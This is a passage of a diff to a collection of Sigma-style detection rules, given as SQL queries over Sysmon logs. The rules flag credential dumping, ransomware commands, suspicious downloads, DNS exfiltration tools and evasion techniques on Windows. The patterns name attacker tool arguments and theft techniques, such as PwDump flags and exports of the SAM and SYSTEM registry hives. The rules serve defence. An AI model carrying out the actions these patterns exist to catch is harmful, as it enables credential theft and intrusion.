'%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", @@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Invoke-Obfuscation CLIP+ Launcher", + "id": "b222df08-0e07-11eb-adc1-0242ac120002", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of 